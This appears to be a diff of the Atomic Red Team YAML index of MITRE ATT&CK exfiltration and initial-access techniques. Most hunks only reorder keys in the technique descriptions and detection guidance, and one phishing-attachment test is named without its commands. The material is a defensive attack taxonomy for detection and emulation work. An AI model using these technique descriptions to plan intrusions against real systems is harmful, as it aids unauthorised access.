@@ -49093,10 +50585,14 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:58:55.433Z'
created: '2020-03-09T14:51:11.772Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
+ x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server) to code repositories.
+ Processes utilizing the network that do not normally have network communication
+ or have never been seen before are suspicious. User behavior monitoring may
+ help to detect abnormal patterns of activity.
x_mitre_data_sources:
- Process monitoring
- Process use of network
@@ -49104,14 +50600,10 @@ exfiltration:
- Netflow/Enclave netflow
- Network protocol analysis
- SSL/TLS inspection
- x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server) to code repositories.
- Processes utilizing the network that do not normally have network communication
- or have never been seen before are suspicious. User behavior monitoring may
- help to detect abnormal patterns of activity.
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1029:
technique:
@@ -49134,22 +50626,22 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:26:48.769Z'
created: '2017-05-31T21:30:34.139Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Monitor process file access patterns and network behavior.
Unrecognized processes or scripts that appear to be traversing file systems
and sending network traffic may be suspicious. Network connections to the
same destination that occur at the same time of day for multiple days are
suspicious.
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1537:
technique:
@@ -49184,25 +50676,25 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-29T23:43:44.256Z'
created: '2019-08-30T13:03:04.038Z'
- x_mitre_platforms:
- - Azure
- - AWS
- - GCP
- x_mitre_contributors:
- - Praetorian
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Monitor account activity for attempts to share data, snapshots,
or backups with untrusted or unusual accounts on the same cloud service provider.
Monitor for anomalous file transfer activity between accounts and to untrusted
VPCs. '
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - Azure
+ - AWS
+ - GCP
atomic_tests: []
initial-access:
T1078.004:
@@ -49244,6 +50736,19 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -49251,19 +50756,6 @@ initial-access:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1195.003:
technique:
@@ -49289,20 +50781,20 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T12:51:45.475Z'
created: '2020-03-11T14:28:40.064Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: Perform physical inspection of hardware to look for potential
+ tampering. Perform integrity checking on pre-OS boot mechanisms that can be
+ manipulated for malicious purposes.
x_mitre_data_sources:
- Component firmware
- BIOS
- Disk forensics
- EFI
- x_mitre_detection: Perform physical inspection of hardware to look for potential
- tampering. Perform integrity checking on pre-OS boot mechanisms that can be
- manipulated for malicious purposes.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195.001:
technique:
@@ -49333,22 +50825,41 @@ initial-access:
phase_name: initial-access
modified: '2020-03-11T14:13:42.916Z'
created: '2020-03-11T14:13:42.916Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Web proxy
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Web proxy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195.002:
technique:
+ created: '2020-03-11T14:17:21.153Z'
+ modified: '2020-03-11T14:17:21.153Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
+ description: "Adversaries may manipulate application software prior to receipt
+ by a final consumer for the purpose of data or system compromise. Supply chain
+ compromise of software can take place in a number of ways, including manipulation
+ of the application source code, manipulation of the update/distribution mechanism
+ for that software, or replacing compiled releases with a modified version.\n\nTargeting
+ may be specific to a desired victim set or may be distributed to a broad set
+ of consumers but only move on to additional tactics on specific victims.(Citation:
+ Avast CCleaner3 2018) (Citation: Command Five SK 2011) "
+ name: Compromise Software Supply Chain
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1195.002
@@ -49362,25 +50873,6 @@ initial-access:
description: Command Five Pty Ltd. (2011, September). SK Hack by an Advanced
Persistent Threat. Retrieved April 6, 2018.
source_name: Command Five SK 2011
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Compromise Software Supply Chain
- description: "Adversaries may manipulate application software prior to receipt
- by a final consumer for the purpose of data or system compromise. Supply chain
- compromise of software can take place in a number of ways, including manipulation
- of the application source code, manipulation of the update/distribution mechanism
- for that software, or replacing compiled releases with a modified version.\n\nTargeting
- may be specific to a desired victim set or may be distributed to a broad set
- of consumers but only move on to additional tactics on specific victims.(Citation:
- Avast CCleaner3 2018) (Citation: Command Five SK 2011) "
- id: attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-11T14:17:21.153Z'
- created: '2020-03-11T14:17:21.153Z'
x_mitre_platforms:
- Linux
- macOS
@@ -49429,6 +50921,20 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -49439,23 +50945,30 @@ initial-access:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -49472,27 +50985,6 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -49573,7 +51065,23 @@ initial-access:
phase_name: initial-access
modified: '2020-03-29T23:48:15.056Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.2'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
+ - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - SaaS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
+
+ Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
+
+ Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.
x_mitre_data_sources:
- Packet capture
- Network device logs
@@ -49581,23 +51089,7 @@ initial-access:
- Web proxy
- Network intrusion detection system
- SSL/TLS inspection
- x_mitre_detection: |-
- Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
-
- Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
-
- Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - SaaS
- x_mitre_contributors:
- - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.2'
atomic_tests: []
T1190:
technique:
@@ -49643,17 +51135,10 @@ initial-access:
phase_name: initial-access
modified: '2020-02-18T16:10:38.866Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - AWS
- - GCP
- - Azure
- x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -49662,10 +51147,17 @@ initial-access:
- Web logs
- Web application firewall logs
- Application logs
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1133:
technique:
@@ -49695,23 +51187,24 @@ initial-access:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T19:37:54.071Z'
+ modified: '2020-06-19T20:07:09.600Z'
created: '2017-05-31T21:31:44.421Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Daniel Oakley
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Follow best practices for detecting adversary use of [Valid
Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to
remote services. Collect authentication logs and analyze for unusual access
patterns, windows of activity, and access outside of normal business hours.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Daniel Oakley
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1200:
technique:
@@ -49759,20 +51252,21 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-17T21:35:06.932Z'
+ modified: '2020-07-14T19:36:40.493Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Asset management
- - Data loss prevention
- x_mitre_detection: "Asset management systems may help with the detection of
- computer systems or network devices that should not exist on a network. \n\nEndpoint
- sensors may be able to detect the addition of hardware via USB, Thunderbolt,
- and other external device communication ports."
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ x_mitre_detection: "Asset management systems may help with the detection of
+ computer systems or network devices that should not exist on a network. \n\nEndpoint
+ sensors may be able to detect the addition of hardware via USB, Thunderbolt,
+ and other external device communication ports."
+ x_mitre_data_sources:
+ - Asset management
+ - Data loss prevention
+ x_mitre_version: '1.0'
atomic_tests: []
T1078.003:
technique:
@@ -49805,21 +51299,21 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1566:
technique:
@@ -49845,22 +51339,6 @@ initial-access:
phase_name: initial-access
modified: '2020-03-28T00:04:46.427Z'
created: '2020-03-02T18:45:07.892Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - SaaS
- - Office 365
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
-
- Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
-
- Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -49871,12 +51349,31 @@ initial-access:
- Detonation chamber
- SSL/TLS inspection
- Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
+
+ Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
+
+ Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - Office 365
atomic_tests: []
T1091:
technique:
- id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Replication Through Removable Media
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1091
+ external_id: T1091
description: Adversaries may move onto systems, possibly those on disconnected
or air-gapped networks, by copying malware to removable media and taking advantage
of Autorun features when the media is inserted into a system and executes.
@@ -49886,20 +51383,18 @@ initial-access:
In the case of Initial Access, this may occur through manual manipulation
of the media, modification of systems used to initially format the media,
or modification to the media's firmware itself.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1091
- external_id: T1091
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ name: Replication Through Removable Media
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-18T17:52:28.429Z'
+ modified: '2020-07-14T19:45:59.638Z'
created: '2017-05-31T21:31:08.977Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
@@ -49942,10 +51437,12 @@ initial-access:
phase_name: initial-access
modified: '2020-03-27T23:56:40.369Z'
created: '2020-03-02T19:05:18.137Z'
- x_mitre_platforms:
- - macOS
- - Windows
- - Linux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -49953,12 +51450,10 @@ initial-access:
- Detonation chamber
- Email gateway
- Mail server
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ - Linux
identifier: T1566.001
atomic_tests:
- name: Download Phishing Attachment - VBScript
@@ -50025,21 +51520,13 @@ initial-access:
name: powershell
T1566.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1566.002
- url: https://attack.mitre.org/techniques/T1566/002
- - external_id: CAPEC-163
- source_name: capec
- url: https://capec.mitre.org/data/definitions/163.html
- - source_name: Trend Micro Pawn Storm OAuth 2017
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
- description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
- in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Spearphishing Link
+ created: '2020-03-02T19:15:44.182Z'
+ modified: '2020-03-02T19:44:47.843Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
description: "Adversaries may send spearphishing emails with a malicious link
in an attempt to elicit sensitive information and/or gain access to victim
systems. Spearphishing with a link is a specific variant of spearphishing.
@@ -50061,13 +51548,21 @@ initial-access:
Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in
order to gain access to protected applications and information.(Citation:
Trend Micro Pawn Storm OAuth 2017)"
- id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-02T19:44:47.843Z'
- created: '2020-03-02T19:15:44.182Z'
+ name: Spearphishing Link
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1566.002
+ url: https://attack.mitre.org/techniques/T1566/002
+ - external_id: CAPEC-163
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/163.html
+ - source_name: Trend Micro Pawn Storm OAuth 2017
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
+ description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
+ in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
x_mitre_platforms:
- Linux
- macOS
@@ -50136,10 +51631,12 @@ initial-access:
phase_name: initial-access
modified: '2020-03-28T00:04:46.264Z'
created: '2020-03-02T19:24:00.951Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Anti-virus
+ - Web proxy
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: "Because most common third-party services used for spearphishing
via service leverage TLS encryption, SSL/TLS inspection is generally required
to detect the initial communication/delivery. With SSL/TLS inspection intrusion
@@ -50150,12 +51647,10 @@ initial-access:
Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe)
for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203)
or usage of malicious scripts."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Anti-virus
- - Web proxy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195:
technique:
@@ -50235,44 +51730,45 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T12:51:45.574Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Veeral Patel
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - Web proxy
+ - File monitoring
x_mitre_detection: Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. Perform physical inspection of hardware
to look for potential tampering.
- x_mitre_data_sources:
- - Web proxy
- - File monitoring
- x_mitre_version: '1.2'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_contributors:
+ - Veeral Patel
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1199:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1199
- external_id: T1199
+ id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.
- name: Trusted Relationship
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1199
+ external_id: T1199
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-10-11T15:20:53.687Z'
+ modified: '2020-07-14T19:38:14.299Z'
created: '2018-04-18T17:59:24.739Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- Windows
@@ -50336,31 +51832,13 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
